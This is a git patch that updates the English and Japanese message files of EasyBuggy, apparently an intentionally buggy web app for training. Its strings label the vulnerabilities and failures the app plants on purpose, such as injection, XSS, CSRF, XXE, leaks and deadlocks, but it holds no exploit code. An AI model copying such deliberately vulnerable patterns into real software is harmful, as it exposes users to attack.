-title.serverinfo.page=Server Information -style.name.bootstrap=Bootstrap + +section.errors=Errors +section.exceptions=Unchecked Exception +section.performance.issue=Performance Issue +section.troubles=Troubles +section.vulnerabilities=Vulnerabilities + +style.description.basic=Basic header and footer are used. style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ -style.name.google.mdl=Google Material Design Lite style.description.google.mdl=For more detail, please refer to the page\: https\://getmdl.io/ -style.name.materialize=Materialize style.description.materialize=For more detail, please refer to the page\: http\://materializecss.com/ -style.name.nonstyle=Non-Style +style.description.monochro=Monochrome header and footer are used. +style.description.noframe=No header and footer are used. style.description.nonstyle=No stylesheet is specified. style.name.basic=Basic -style.description.basic=Basic header and footer are used. +style.name.bootstrap=Bootstrap +style.name.google.mdl=Google Material Design Lite +style.name.materialize=Materialize style.name.monochro=Monochrome -style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame -style.description.noframe=No header and footer are used. -title.filedescriptorleak.page=Access History +style.name.nonstyle=Non-Style + title.adminmain.page=Main Page for Administrators +title.clickjacking.page=Change Your Mail +title.clientinfo.page=Client Information +title.codeinjection.page=Parse JSON +title.commandinjection.page=Performing Basic Numeric Operations +title.createobjects.page=Sum of natural numbers +title.csrf.page=Change Your Password title.current.date=Display Current Date -title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time +title.dbconnectionleak.page=User List title.deadlock.page=Detect Deadlock +title.design.test.page=Design Test title.endlesswaiting.page=Execute Batch -title.nullbyteinjection.page=Download Guides -title.index.page=EasyBuggy Boot +title.filedescriptorleak.page=Access History +title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator title.memoryleak.page=Heap Memory Usage title.memoryleak2.page=Non-Heap Memory Usage +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones title.mojibake.page=Capitalize String -title.commandinjection.page=Performing Basic Numeric Operations -title.codeinjection.page=Parse JSON title.netsocketleak.page=Measure Response Time -title.strplusopr.page=Random String Generator +title.nullbyteinjection.page=Download Guides title.roundofferror.page=Easy Subtraction +title.serverinfo.page=Server Information title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number -title.createobjects.page=Sum of natural numbers -title.memoryleak3.page=Display Time Zone Information -title.memoryleak3.page.list=Lists of Time Zones +title.strplusopr.page=Random String Generator +title.threadleak.page=Display Current Thread Count title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File -title.dbconnectionleak.page=User List -title.xss.page=Reverse String title.xee.page=Batch Registration of Users +title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 890eb9547a9412da60efc4cc5cf3e661864b2f20 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 24 Oct 2017 21:52:35 +0900 Subject: [PATCH 032/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 355 ++++++++++------------ 1 file changed, 165 insertions(+), 190 deletions(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index f14cbf1..8493efe 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -1,148 +1,122 @@ #X-Generator: crowdin.com -description.all=\u8b66\u544a\uff1a\u4e00\u90e8\u306e\u30ea\u30f3\u30af\u306f\u91cd\u5927\u306a\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u3084CPU\u4f7f\u7528\u7387\u306e\u4e0a\u6607\u3092\u5f15\u304d\u8d77\u3053\u3057\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u306e\u52d5\u4f5c\u304c\u4e0d\u5b89\u5b9a\u306b\u306a\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\n\u7d50\u679c\u306fJRE\u306e\u7a2e\u985e/\u30d0\u30fc\u30b8\u30e7\u30f3\u3001JVM\u30aa\u30d7\u30b7\u30e7\u30f3\u3001OS\u3001\u30cf\u30fc\u30c9\u30a6\u30a7\u30a2\uff08\u30e1\u30e2\u30ea\u3084CPU\uff09\u306a\u3069\u306b\u3088\u3063\u3066\u5909\u308f\u308b\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002 - -section.troubles=\u969c\u5bb3 +description.access.history=\u3053\u306e\u30da\u30fc\u30b8\u306e\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 (\u6700\u65b0\u306e15\u4ef6) +description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5148\u982d\u3092\u5927\u6587\u5b57\u306b\u3057\u3066\u8868\u793a\u3057\u307e\u3059\u3002\u4f8b) capitalize string -> Capitalize String +description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. +description.design.test=\u4ee5\u4e0b\u306e\u3044\u305a\u308c\u304b\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3057\u3066\u4e0b\u3055\u3044\u3002 +description.endless.waiting=\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u305d\u306e\u6587\u5b57\u6570\u5206\u306eecho\u3092\u5b9f\u884c\u3059\u308b\u30d0\u30c3\u30c1\u3092\u4f5c\u6210\u3001\u5b9f\u884c\u3057\u307e\u3059\u3002 +description.errors=OutOfMemoryError\u3001StackOverflowError\u3001NoClassDefFoundError\u306a\u3069 +description.parse.json=JSON\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001JavaScript\u306eJSON.parse()\u3067\u691c\u8a3c\u3057\u305f\u7d50\u679c\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 +description.performance.issue=\u6027\u80fd\u306b\u95a2\u3059\u308b\u554f\u984c +description.random.string.generator=\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u305d\u306e\u6587\u5b57\u6570\u5206\u306e\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210\u3057\u307e\u3059\u3002 +description.response.time=\u30af\u30a8\u30ea\u6587\u5b57\u5217\u306bpingurl\=[\u4efb\u610fURL]\u3092\u8ffd\u52a0\u3059\u308b\u3068\u3001\u305d\u306eURL\u304b\u3089\u306e\u5fdc\u7b54\u30b3\u30fc\u30c9\u3068\u6642\u9593\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 +description.reverse.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u304c\u9006\u8ee2\u3057\u3066\u8868\u793a\u3055\u308c\u307e\u3059\u3002 +description.section.exceptions=java.lang.RuntimeException\u304b\u3089\u7d99\u627f\u3057\u305f\u4f8b\u5916 +description.send.mail=\u30b5\u30a4\u30c8\u306e\u7ba1\u7406\u8005\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 +description.test.regular.expression=\u6b63\u898f\u8868\u73fe^([a-z0-9]+[-]{0,1}){1,100}$\u306b\u4e00\u81f4\u3059\u308b\u6587\u5b57\u5217\u304b\u30c6\u30b9\u30c8\u3057\u3066\u4e0b\u3055\u3044\u3002 description.troubles=\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u3001\u7121\u9650\u30eb\u30fc\u30d7\u3001\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u306a\u3069 +description.vulnerabilities=XSS\u3001SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3001LDAP\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306a\u3069 -function.name.memory.leak=\u30e1\u30e2\u30ea\u30ea\u30fc\u30af (Java\u30d2\u30fc\u30d7\u9818\u57df) -function.description.memory.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001Java\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.memory.leak2=\u30e1\u30e2\u30ea\u30ea\u30fc\u30af ({0}) -function.description.memory.leak2=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001{0}\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.memory.leak3=\u30e1\u30e2\u30ea\u30ea\u30fc\u30af (C\u30d2\u30fc\u30d7\u9818\u57df) -function.description.memory.leak3=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001C\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.infinite.loop=\u7121\u9650\u30eb\u30fc\u30d7 -function.description.infinite.loop=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u7121\u9650\u30eb\u30fc\u30d7\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.dead.lock=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af (Java) +function.description.brute.force=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306b\u306f\u30a2\u30ab\u30a6\u30f3\u30c8\u30ed\u30c3\u30af\u304c\u7121\u3044\u305f\u3081\u3001\u30d6\u30eb\u30fc\u30c8\u30d5\u30a9\u30fc\u30b9\u653b\u6483\u306b\u5bfe\u3057\u3066\u306e\u8106\u5f31\u3067\u3059\u3002 +function.description.clickjacking=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306f\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.code.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.csrf=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306fCSRF\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.dangerous.file.inclusion=\u3053\u306e\u30da\u30fc\u30b8\u3067\u306f\u5916\u90e8\u306e\u5371\u967a\u306a\u30d5\u30a1\u30a4\u30eb\u3092\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u53ef\u80fd\u3067\u3059\u3002 +function.description.database.connection.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 function.description.dead.lock=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af(Java)\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 -function.name.dead.lock2=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af (SQL) function.description.dead.lock2=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af(SQL)\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 -function.name.endless.waiting.process=\u5b8c\u4e86\u3057\u306a\u3044\u30d7\u30ed\u30bb\u30b9\u306e\u5f85\u6a5f +function.description.ei.error=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u521d\u56de\u306fExceptionInInitializerError\u304c\u3001\u305d\u306e\u5f8c\u306fNoClassDefFoundError\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 function.description.endless.waiting.process=\u5b8c\u4e86\u3057\u306a\u3044\u30d7\u30ed\u30bb\u30b9\u306e\u5f85\u6a5f\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 -function.name.jvm.crash.eav=JVM\u30af\u30e9\u30c3\u30b7\u30e5 -function.description.jvm.crash.eav=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068JVM\u304c\u30af\u30e9\u30c3\u30b7\u30e5\u3057\u307e\u3059\u3002 -function.name.redirect.loop=\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u30eb\u30fc\u30d7 -function.description.redirect.loop=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u30eb\u30fc\u30d7\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.forward.loop=\u30d5\u30a9\u30ef\u30fc\u30c9\u30eb\u30fc\u30d7 -function.description.forward.loop=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30d5\u30a9\u30ef\u30fc\u30c9\u30eb\u30fc\u30d7\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.network.socket.leak=\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af -function.description.network.socket.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.database.connection.leak=\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af -function.description.database.connection.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.file.descriptor.leak=\u30d5\u30a1\u30a4\u30eb\u30c7\u30a3\u30b9\u30af\u30ea\u30d7\u30bf\u30ea\u30fc\u30af function.description.file.descriptor.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u30c7\u30a3\u30b9\u30af\u30ea\u30d7\u30bf\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.thread.leak=\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af -function.description.thread.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.mojibake=\u6587\u5b57\u5316\u3051 -function.description.mojibake=\u7279\u5b9a\u306e\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5316\u3051\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -function.name.int.overflow=\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc +function.description.forward.loop=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30d5\u30a9\u30ef\u30fc\u30c9\u30eb\u30fc\u30d7\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.description.infinite.loop=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u7121\u9650\u30eb\u30fc\u30d7\u304c\u767a\u751f\u3057\u307e\u3059\u3002 function.description.int.overflow=\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 -function.name.round.off.error=\u4e38\u3081\u8aa4\u5dee -function.description.round.off.error=\u4e38\u3081\u8aa4\u5dee\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 -function.name.truncation.error=\u6253\u3061\u5207\u308a\u8aa4\u5dee -function.description.truncation.error=\u6253\u3061\u5207\u308a\u8aa4\u5dee\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 -function.name.cancellation.of.significant.digits=\u6841\u843d\u3061 -function.description.cancellation.of.significant.digits=\u6841\u843d\u3061\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 -function.name.loss.of.trailing.digits=\u60c5\u5831\u843d\u3061 +function.description.jvm.crash.eav=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068JVM\u304c\u30af\u30e9\u30c3\u30b7\u30e5\u3057\u307e\u3059\u3002 +function.description.ldap.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fLDAP\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.loss.of.trailing.digits=\u60c5\u5831\u843d\u3061\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 - - -section.performance.issue=\u6027\u80fd\u554f\u984c -description.performance.issue=\u6027\u80fd\u306b\u95a2\u3059\u308b\u554f\u984c - -function.name.slow.regular.expression=\u6b63\u898f\u8868\u73fe\u89e3\u6790\u306b\u3088\u308b\u9045\u5ef6 +function.description.mail.header.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30e1\u30fc\u30eb\u30d8\u30c3\u30c0\u30fc\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.memory.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001Java\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.description.memory.leak2=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001{0}\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.description.memory.leak3=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001C\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.description.mojibake=\u7279\u5b9a\u306e\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5316\u3051\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.description.network.socket.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.description.null.byte.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fNull\u30d0\u30a4\u30c8\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.open.redirect=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306b\u306f\u30aa\u30fc\u30d7\u30f3\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.os.command.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fOS\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.path.traversal=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.redirect.loop=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u30eb\u30fc\u30d7\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.description.round.off.error=\u4e38\u3081\u8aa4\u5dee\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 +function.description.session.fixation=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306b\u306f\u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.slow.regular.expression=\u7279\u5b9a\u306e\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6b63\u898f\u8868\u73fe\u306e\u89e3\u6790\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 -function.name.slow.string.plus.operation=\u30d7\u30e9\u30b9\u6f14\u7b97\u5b50\u306b\u3088\u308b\u6587\u5b57\u5217\u7d50\u5408\u306e\u9045\u5ef6 function.description.slow.string.plus.operation=\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u9023\u7d50\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 -function.name.slow.unnecessary.object.creation=\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308b\u9045\u5ef6 function.description.slow.unnecessary.object.creation=\u5927\u304d\u306a\u6570\u5024\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308a\u3001\u5fdc\u7b54\u6642\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 -function.name.stop.the.world=\u30b9\u30c8\u30c3\u30d7\u30b6\u30ef\u30fc\u30eb\u30c9 -function.description.stop.the.world=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30b9\u30c8\u30c3\u30d7\u30b6\u30ef\u30fc\u30eb\u30c9\u304c\u767a\u751f\u3057\u307e\u3059\u3002 - - -section.vulnerabilities=\u8106\u5f31\u6027 -description.vulnerabilities=XSS\u3001SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3001LDAP\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306a\u3069 - -function.name.xss=XSS (\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0) -function.description.xss=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXSS\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.name.sql.injection=SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 function.description.sql.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fSQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.name.ldap.injection=LDAP\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 -function.description.ldap.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fLDAP\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.thread.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.description.throwable=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001{0}\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 +function.description.truncation.error=\u6253\u3061\u5207\u308a\u8aa4\u5dee\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 +function.description.unintended.file.disclosure=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u610f\u56f3\u3057\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u516c\u958b\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.unrestricted.ext.upload=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u306e\u62e1\u5f35\u5b50\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 +function.description.unrestricted.size.upload=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u306e\u30b5\u30a4\u30ba\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 +function.description.verbose.error.message=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u89aa\u5207\u904e\u304e\u308b\u305f\u3081\u3001ID\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u63a8\u6e2c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3067\u3059\u3002 +function.description.xee=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXEE\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.xss=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXSS\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.xxe=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXXE\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.name.brute.force=\u30d6\u30eb\u30fc\u30c8\u30d5\u30a9\u30fc\u30b9\u653b\u6483\u53ef\u80fd\u306a\u30ed\u30b0\u30a4\u30f3\u753b\u9762 +function.name.clickjacking=\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0 function.name.code.injection=\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 -function.description.code.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.name.os.command.injection=OS\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 -function.description.os.command.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fOS\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.name.csrf=CSRF (\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30ea\u30af\u30a8\u30b9\u30c8\u30d5\u30a9\u30fc\u30b8\u30a7\u30ea) +function.name.dangerous.file.inclusion=\u5371\u967a\u306a\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9 